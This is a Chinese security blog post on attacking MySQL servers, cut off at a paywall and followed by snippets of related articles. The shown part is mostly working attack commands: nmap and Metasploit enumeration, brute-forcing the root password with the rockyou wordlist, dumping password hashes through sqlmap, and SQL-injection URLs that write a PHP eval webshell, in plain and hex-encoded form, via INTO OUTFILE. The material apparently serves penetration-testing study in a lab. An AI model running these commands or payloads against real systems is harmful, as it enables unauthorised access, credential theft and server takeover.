mysql漏洞利用与提权

最新推荐文章于 2025-05-02 19:00:47 发布
最新推荐文章于 2025-05-02 19:00:47 发布
阅读量2.8k 收藏 11
点赞数 2
分类专栏: web安全学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_34640691/article/details/116010014
版权
本文详细介绍了如何利用MySQL的信息收集、密码获取、通过SQL注入写入shell以及多种提权方法,包括UDF提权、启动项提权、反弹端口提权等,并涉及CVE-2016-6663等相关漏洞的利用。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

目录

一 、Mysql信息收集

1.使用Nmap进行mysql的信息收集

2.通过msf探测mysql信息

3.使用sqlmap进行sql注入收集mysql版本信息

二、获取mysql密码

1.使用msf模块爆破

2.nmap脚本进行爆破

3.sqlmap的sql-shell查询哈希值

4.从网站泄露的源代码中查找配置文件获取用户名密码

三、通过Mysql向服务器写shell

1.利用联合注入写入shell

2.当sql注入为盲注或者报错注入时,可以使用分隔符写入shell

3.当secure_file_priv为NULL写入shell

四、Mysql提权

1.UDF手动提权

1.1msf下使用UDF提权

2.mysql启动项提权

​2.2 msf启动项提权

3.反弹端口提权

4.CVE-2016-6663提权

一 、Mysql信息收集

1.使用Nmap进行mysql的信息收集

nmap -sC -sV 192.168.0.107 -p3306

或者使用nmap的nse脚本对MySQL进行扫描

└─# ls -lah /usr/share/nmap/scripts/*mysql*
-rw-r--r-- 1 root root 6.5K Oct 12  2020 /usr/share/nmap/scripts/mysql-audit.nse
-rw-r--r-- 1 root root 3.0K Oct 12  2020 /usr/share/nmap/scripts/mysql-brute.nse
-rw-r--r-- 1 root root 2.9K Oct 12  2020 /usr/share/nmap/scripts/mysql-databases.nse
-rw-r--r-- 1 root root 3.2K Oct 12  2020 /usr/share/nmap/scripts/mysql-dump-hashes.nse
-rw-r--r-- 1 root root 2.0K Oct 12  2020 /usr/share/nmap/scripts/mysql-empty-password.nse
-rw-r--r-- 1 root root 3.4K Oct 12  2020 /usr/share/nmap/scripts/mysql-enum.nse
-rw-r--r-- 1 root root 3.4K Oct 12  2020 /usr/share/nmap/scripts/mysql-info.nse
-rw-r--r-- 1 root root 3.7K Oct 12  2020 /usr/share/nmap/scripts/mysql-query.nse
-rw-r--r-- 1 root root 2.8K Oct 12  2020 /usr/share/nmap/scripts/mysql-users.nse
-rw-r--r-- 1 root root 3.2K Oct 12  2020 /usr/share/nmap/scripts/mysql-variables.nse
-rw-r--r-- 1 root root 6.9K Oct 12  2020 /usr/share/nmap/scripts/mysql-vuln-cve2012-2122.nse


nmap --script=mysql-enum 192.168.0.107 -p3306    #枚举mysql用户名,结果不一定准确

2.通过msf探测mysql信息

use auxiliary/scanner/mysql/mysql_authbypass_hashdump
use auxiliary/scanner/mysql/mysql_login
use auxiliary/scanner/mysql/mysql_writable_dirs
use auxiliary/scanner/mysql/mysql_file_enum            
use auxiliary/scanner/mysql/mysql_schemadump           
use auxiliary/scanner/mysql/mysql_hashdump             
use auxiliary/scanner/mysql/mysql_version

下图以探测mysql版本为例

3.使用sqlmap进行sql注入收集mysql版本信息

sqlmap -u "http://192.168.0.107/sqli/Less-1/?id=1" --batch  --threads 10 -v 3

 

二、获取mysql密码

1.使用msf模块爆破

use auxiliary/scanner/mysql/mysql_login
set username root
set pass_file /usr/share/wordlists/rockyou.txt
set rhosts 192.168.0.107
run

2.nmap脚本进行爆破

nmap -p 3306 --script=mysql-brute.nse userdb=/usr/share/wordlists/user.txt passdb=/usr/share/wordlists/rockyou.txt 192.168.0.107

3.sqlmap的sql-shell查询哈希值

sqlmap -u "http://192.168.0.107/sqli/Less-1/?id=1" --batch  --threads 100 --sql-shell -v 3 
select host, user, password from mysql.user;    #MySQL的用户名密码哈希值保存在mysql库的user表中

# MySQL <= 5.6 版本
mysql> select host, user, password from mysql.user;
# MySQL >= 5.7 版本
mysql > select host,user,authentication_string from mysql.user;

在cmd5网址查询

4.从网站泄露的源代码中查找配置文件获取用户名密码

 

三、通过Mysql向服务器写shell

条件:

  • 存在sql注入漏洞
  • 需要知道网站的web物理路径
  • 当前用户有文件写入权限
  • secure_file_priv 选项支持数据导出
show global variables like "secure_file_priv";
 
secure_file_priv参数用于限制LOAD DATA, SELECT …OUTFILE, LOAD_FILE()传到哪个指定目录。
    secure_file_priv 为 NULL 时,表示限制mysqld不允许导入或导出。
    secure_file_priv 为 /tmp 时,表示限制mysqld只能在/tmp目录中执行导入导出,其他目录不能执行。
    secure_file_priv 没有值时,表示不限制mysqld在任意目录的导入导出。



在 MySQL 5.5 之前 secure_file_priv 默认是空,这个情况下可以向任意绝对路径写文件
在 MySQL 5.5之后 secure_file_priv 默认是 NULL,这个情况下不可以写文件

(1)需要修改mysql配置文件,my.ini最后一行添加secure_file_priv='C:/',重启mysql,再次查询

(2)查看网站的绝对路径

通过phpinfo或者sql报错注入

1.利用联合注入写入shell

http://192.168.0.107/sqli/Less-1/?id=-1' union select 1,2,'<?php @eval($_post["pass"]);?>' into outfile "C:\\Phpsdudy\\PHPTutorial\\WWW\\1.php"--+

或者把php一句话十六进制编码mysql支持hex编码
http://192.168.0.107/sqli/Less-1/?id=-1' union select 1,2,0x3C3F70687020406576616C28245F706F73745B2270617373225D293B3F3E into outfile "C:\\Phpsdudy\\PHPTutorial\\WWW\\2.php"--+
最低0.47元/天 解锁文章
网络攻防实战研究 漏洞利用读书笔记二
一枚努力的蛋蛋
08-24 3440
网络攻防实战研究 漏洞利用读书笔记二第2章 Windows漏洞利用2.1 Windows基础2.1.1 Windows信息的收集2.1.2 Windows准备2.1.3 使用MSF平台搜索可利用的POC2.1.4 实施2.1.5 停用安全狗2.2 辅助工具Windows-Exploit-Suggester2.2.1 Windows-Exploit-Suggester...
Mysql数据库的UDF
CoffeMilk的博客
11-05 4208
渗透人员编写可调用系统命令行(CMD或shell)的文件生成动态链接库(Windows系统是.dll;Linux系统是.so),且将该动态链接库内容上传到MySql的函数插件文件夹目录下;然后在通过sql语句调用该动态链接库创建一个自定义函数,最后直接调用该自定义函数sql执行查询系统命令,实现(即:在数据库中的查询就等价于直接在系统调用cmd或者shell中执行命令)
Mysql漏洞利用(越,实战怎么从低限拿到root密码)
07-30
Mysql漏洞利用(越,实战怎么从低限拿到root密码)
mysql udf_mysql数据库漏洞利用方式小结
weixin_39971435的博客
12-05 747
转先知社区作者:ghtwf01CVE-2012-2122 Mysql身份认证漏洞影响版本Mysql在5.5.24之前MariaDB也差不多这个版本之前漏洞原理只要知道用户名,不断尝试就能够直接登入SQL数据库,按照公告说法大约256次就能够蒙对一次漏洞复现msf利用hash解密得到密码即可登录python exp#!/usr/bin/pythonimport subprocesswhi...
利用数据库漏洞
最新发布
m0_74849202的博客
05-02 576
我们再查看哥斯拉,这里host的值有localhost,127.0.0.1,::1均表示的从内部连接,webshell能连上的原因是它在网站服务器上面,由它发起的请求属于内部,而navicat的连接属于外部,同样,msf数据库建立连接也属于外部。使用 MSF 中的 exploit/multi/mysql/mysql_udf_payload 模块可以进行mysql的UDF ,这个模块是专用于mysql的UDF 的,会根据mysql版本自动将创建的.dll文件导入对应文件目录下。
MySQL 严重 Bug - 用户登陆漏洞[转发]
weixin_30566149的博客
06-12 151
Security vulnerability in MySQL/MariaDB 在知道用户名的情况下(如root),直接反复重试(平均大约256次)即可登入。 受影响的版本: All MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 are vulnerable.MariaDB versions from 5.1.62...
mysql 漏洞利用
weixin_30821731的博客
07-13 288
判断MySQL服务运行的限 1、查看系统账号,如果出现MySQL这类用户,意味着系统可能出现了降。 2、看mysqld运行的priority值。 3、查看端口是否可外联。 MySQL密码获取破解 1、获取网站数据库账号和密码 2、获取MySQL数据库user表 用户一共有三个文件,即user.frm、user.MYD、user.MYI,MySQL数据库用户密码都保存在us...
MySQL 漏洞利用
weixin_50464560的博客
07-15 2776
转载于https://www.sqlsec.com/2020/11/mysql.html#toc-heading-1 自从接触安全以来就 MySQL 的 UDF 、MOF 耳熟能详,但是貌似国光我一直都没有单独总结过这些零散的姿势点,所以本文就诞生了,再解决自己以前的困扰之余,也希望本文可以帮助到其他网友。限获取数据库操作限本文讲的是 MySQL 相关知识,但是之前得先拿到高限的 MySQL 用户才可以,拿到 MySQL 的用户名和密码的方式多种多样,但是不外乎就下面几种方法:MySQ
Linux利用UDF库实现Mysql
09-10
请注意,这种方法具有潜在的安全风险,如果被恶意利用,可能导致系统安全漏洞。因此,理解并妥善管理MySQL的UDF功能至关重要,只有在必要且受控的环境下进行此类操作。在生产环境中,务必遵循最小限原则,并...
MySQL数据库渗透及漏洞利用总结
02-25
各种Mysql注入,MysqlMysql数据库root账号webshell获取等的,但没有一个对Mysql数据库渗透较为全面对总结,针对这种情况我们开展了研究,虽然我们团队今年正在出版《网络攻防实战研究——漏洞利用》,但...
mysql漏洞
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
11-17 240
linux+mysql怎么 据我所知mysql没有管理账号这样的概念,只有不同的用户限。默认root用户就具有所有的限,你可以新建一个用户,使它拥有所有的限,还可以指定从什么地方登陆。限划分可以很细的,可以精确到table,像select这种简单的查看功能命令都可以限定。具体命令像create,grant等等...
mysql5 注入漏洞
10-30
mysql5注入漏洞代码
About Mysql 的那个漏洞
代码析构师的专栏
06-05 614
致看了一下,原来是在导出文件的时候出的问题,具体怎么出的问题,表示看mysql的源码不是我能看的来的。。 大家都知道,要对方开启mysql的外联,并且有root密码,这种情况只能用来扫肉鸡了,还蛋疼的不行。所以我感觉用在webshell下辅助不错,毕竟如果导udf什么相对麻烦了一些。所以就有下面的利用: 1.找个可写目录,我这里是C:\recycler\,把如下代码写到nullev
mysql(linux)远程数据库漏洞_MySQL(Linux)远程数据库漏洞
weixin_29914581的博客
01-19 242
漏洞在12月1日的Seclist上发布,作者在Debian Lenny (mysql-5.0.51a) 、 OpenSuSE 11.4 (5.1.53-log)上测试成功,代码执行成功后会增加一个MySQL的管理员帐号。[php]use DBI();$|=1;=for commentMySQL privilege elevation ExploitThis exploit adds a new a...
MySql注入漏洞
weixin_44906495的博客
04-20 1663
1、简介   1.1、SQL注入的本质   web程序代码中对于用户交的参数未做过滤就直接放到SQL语句中执行,导致参数中的特殊字符打破了SQL语句原有逻辑,黑客可以利用漏洞执行任意SQL语句.      1.2、什么是SQL注入   1.是一种将SQL语句插入或添加到应用(用户)的输入参数中的攻击   2.这些参数传递给后台的SQL数据库服务器加以解析并执行.      1...
学习:MySQL数据库(mof 漏洞
bylfsj的博客
10-12 717
1.原理 关于 mof 的原理其实很简单,就是利用了c:/windows/system32/wbem/mof/目录下的 nullevt.mof 文件,每分钟都会在一个特定的时间去执行一次的特性,来写入我们的cmd命令使其被带入执行。 2.执行 1.将一下代码保存为nullevt.mof文件 #pragma namespace("\\.\root\subscription") instance ...
mysql 漏洞 2015_Oracle MySQL Server远程安全漏洞(CVE-2015-0411)
weixin_34570232的博客
01-21 942
发布日期:2015-01-20更新日期:2015-01-22受影响系统:Oracle MySQL Server <= 5.6.21Oracle MySQL Server <= 5.5.40描述:BUGTRAQ ID: 72191CVE(CAN) ID: CVE-2015-0411Oracle MySQL Server是一个轻量的关系型数据库系统。Oracle MySQL Server...
数据库安全:MySQL 身份认证漏洞(CVE-2012-2122)
网络安全领域___专研者.
11-10 935
MySQL 身份认证漏洞是一个身份认证绕过漏洞,该漏洞的核心原理涉及到 MySQL 在处理身份认证时的一个安全缺陷,这个漏洞可以使攻击者可以绕过安全身份认证,从而达到未经授的方式进行访问 MySQL 数据库。
【安全漏洞MySQL 8.0.33 、CVE-2023-22102
weixin_43652507的博客
09-13 1922
MySQL 8.0.33 、CVE-2023-22102 安全漏洞已解决
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值